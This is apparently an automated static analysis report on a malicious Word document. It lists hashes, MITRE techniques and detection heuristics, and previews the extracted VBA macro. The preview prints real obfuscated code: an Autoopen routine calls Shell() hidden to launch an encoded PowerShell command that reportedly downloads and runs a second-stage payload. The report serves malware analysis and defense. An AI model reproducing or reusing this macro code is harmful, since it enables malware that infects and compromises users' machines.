Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9577343d1647ae8b…

MALICIOUS

Office (OLE)

Size: 110.5 KB
Created: 2018-05-25 07:05:00
Authoring application: Microsoft Office Word
First seen: 2019-01-31
MD5: ef767e00dfcac2ae89c22ff566fdcc0a
SHA-1: 50f998d9543a0ece673634e1e1728b6ea98c827c
SHA-256: 9577343d1647ae8bb69dfc7a9fb3f3ad533adea4eded0f0c0be7aca20bc28d6f
Risk Score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File

The sample contains a VBA macro with an Autoopen function that calls a Shell() function. This function is used to execute a PowerShell command, which is obfuscated but appears to be designed to download and execute a second-stage payload. The presence of the Autoopen macro and the Shell() call strongly indicate malicious intent.

Heuristics (6)

  • VBA macros detected (medium; 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15765 bytes
SHA-256: 5c554edb395bb0d18093e4f1d18f250f0c3f3c1b680b12d11ec04912eebea496
Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "wvjUjsVjRBrV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function jwYUlUitb()
On Error Resume Next
jcmsY = XkTIEv - Cos(JjKCSM) * 1 - Chr(46272) / 791 - ChrB(XXtizw)
ILfkQ = 29731
AAoik = TCpLf - Cos(jSmIu) * 1 - Chr(56226) / 7718 - ChrB(EOwqi)
kKzYKN = 87619
jwYUlUitb = OZBGiUw + UEWdJEAOsON + NujwnRHpS + MGlChHC + fcNMwK + DcVRRKB + GBFrAMFOT + mNAujY + anVmvLWiMQk
JCiin = PUihCm - Cos(hVClH) * 1 - Chr(24438) / 28010 - ChrB(mCwzI)
IFQAS = 37564
End Function
Sub Autoopen()
On Error Resume Next
JkiMp = ljfQn - Cos(NDovnD) * 1 - Chr(828) / 59615 - ChrB(XzjjfW)
PSjkS = 84634
IliiOwThNXo (jwYUlUitb)
lXYSB = jGlKGu - Cos(TKdzR) * 1 - Chr(77948) / 47133 - ChrB(kwdKoi)
NjCaV = 58885
End Sub
Function IliiOwThNXo(wuUwBwzUY)
On Error Resume Next
XOlwB = RNVck - Cos(nFpjS) * 1 - Chr(57658) / 37508 - ChrB(AYvHNz)
sCHjZ = 78939
mOMTm = UWdAa - Cos(qPYzkw) * 1 - Chr(4659) / 83791 - ChrB(wTdkC)
YLOwL = 26544
lpqioDlwUHX = Shell(iTufUbVfRZ + Chr(vbKeyP) + UpMwoZj + wuUwBwzUY, vbHide)
SaXzr = Sivuh - Cos(IzUCXj) * 1 - Chr(43431) / 95148 - ChrB(ouiik)
vLOEP = 45426
End Function


Attribute VB_Name = "zzckFrYYC"
Function OZBGiUw()
On Error Resume Next
rjKdt = wTJdAo - Cos(EjjIa) * 1 - Chr(2091) / 21700 - ChrB(zOwJH)
dTszz = 87180
ocPCSzVXI = "owersH" + "eLL -WinDow" + "sTyle " + "hidden -e I" + "AAuACgAKABnAG" + "UAVAAtA" + "HYAYQBy" + "AEkAQQBCAGw" + "AZQAgACc" + "AKgBtAEQAcgAqAC"
QHmLMs = zGduTc - Cos(oIVkSK) * 1 - Chr(98123) / 84957 - ChrB(LUmXS)
QiAvb = 77451
XziUj = "cAKQAuAG4AYQ" + "BNAEUA" + "WwAzACwAMQ" + "AxACwA" + "MgBdAC0AagBvA" + "EkAbgAnACcAKQAo" + "ACAAKA" + "AoACIAewAxADcA" + "fQB7ADEAMAB9AHs" + "ANAA3AH0A"
zwOIR = skEqi - Cos(oKXOjj) * 1 - Chr(84930) / 46250 - ChrB(arZVaz)
wtXBAP = 22323
jZpqOsawF = "ewAxADIANgB9AH" + "sANwAzAH0Aew" + "AzADEAfQ" + "B7ADkANAB" + "9AHsAMQAxAD"
WKsoz = HdIviq - Cos(PUMjQk) * 1 - Chr(43807) / 10370 - ChrB(mrLDmL)
dbZww = 85519
vGmKjHbzOr = "UAfQB7ADk" + "AOQB9AH" + "sANQA5AH" + "0AewA" + "xADAAMAB9AHs" + "AOQAwAH0Ae" + "wAzADcAf"
OZBGiUw = ocPCSzVXI + XziUj + jZpqOsawF + vGmKjHbzOr
End Function
Function UEWdJEAOsON()
On Error Resume Next
rDYGT = RawJw - Cos(ZLRkio) * 1 - Chr(37360) / 64912 - ChrB(Acvvv)
iTFru = 45208
nZZWSjTS = "QB7ADEAMgA0A" + "H0AewA3ADAAf" + "QB7ADIAMQB9A" + "HsAMAB9" + "AHsAMgA3A"
VfriDr = MuCGD - Cos(HLruJf) * 1 - Chr(20614) / 95780 - ChrB(bcLXCm)
rRCLb = 81410
TnbmfV = "H0Aew" + "A4ADYAfQB7AD" + "YAMQB9AHsAOQA4A" + "H0AewA" + "1ADUA"
sAlbKL = aprKD - Cos(cKhPM) * 1 - Chr(362) / 59404 - ChrB(OSjok)
DkEsK = 33068
msPQuEM = "fQB7A" + "DQAMAB9AHsANwB9" + "AHsAMQAwADYAf" + "QB7ADYAN" + "gB9AHs" + "AMwA4AH" + "0AewA1ADYAfQB7" + "ADgAMQB9AH" + "sAMQAxA"
wuYDA = jAnTNz - Cos(ijkmw) * 1 - Chr(52339) / 22013 - ChrB(ihFmZF)
qkwzm = 89196
IXXHUBarZ = "DQAfQB7ADIAN" + "gB9AHsANQA3A" + "H0AewA3ADQAf" + "QB7ADEAMgAxAH0" + "AewA3ADYAf" + "QB7ADEA" + "MAA3AH0AewA0A" + "DEAfQ"
QJLMOu = awSpR - Cos(WASujF) * 1 - Chr(82873) / 39249 - ChrB(TQajj)
DUNNY = 823
OMwkNnGjrJ = "B7ADYAMgB" + "9AHsA" + "NAA0AH0AewAxAD" + "EAMgB9AHsA" + "NwA5AH0AewAx" + "ADkAfQB7AD"
balMQ = DjmzIi - Cos(qSEQjD) * 1 - Chr(17734) / 8098 - ChrB(vmiOtX)
FbsbGY = 83805
uKIcNUipZJ = "YAfQB7AD" + "UAOAB9AHs" + "ANwA1AH0AewAxA" + "DIAMAB9AHs" + "AMQAyAH0Aew" + "A4ADQAfQB7A" + "DEAMQB" + "9AHsAMQ" + "A1AH0AewAxADQAf"
WpMQd = SRBATl - Cos(zhVrM) * 1 - Chr(72502) / 59851 - ChrB(iCkjEj)
PCaRa = 91740
HlFiOHTzd = "QB7ADEAM" + "QA4AH0AewAxAD" + "IANQB9AHsAO" + "AA4AH0Aew" + "AxADAAMwB9A" + "HsAMQAx" + "ADMAfQB7" + "ADEAMQA5AH0AewA" + "4ADkAfQB7"
qqsaIc = jNZmN - Cos(uXkun) * 1 - Chr(23961) / 18591 - ChrB(mckYAw)
zaCKU = 6857
rZisqw = "ADcAMQB9AH" + "sANgA5AH0" + "AewA2ADUAfQB7" + "ADQAOAB9AHsA"
fwldCi = pKurZc - Cos(SfiOmC) * 1 - Chr(7937) / 26442 - ChrB(CHjRj)
XbtEDs = 72163
ZqRPLwT = "OAA1A" + "H0AewA0ADUAfQB" + "7ADQANg" + "B9AHsAO
... (truncated)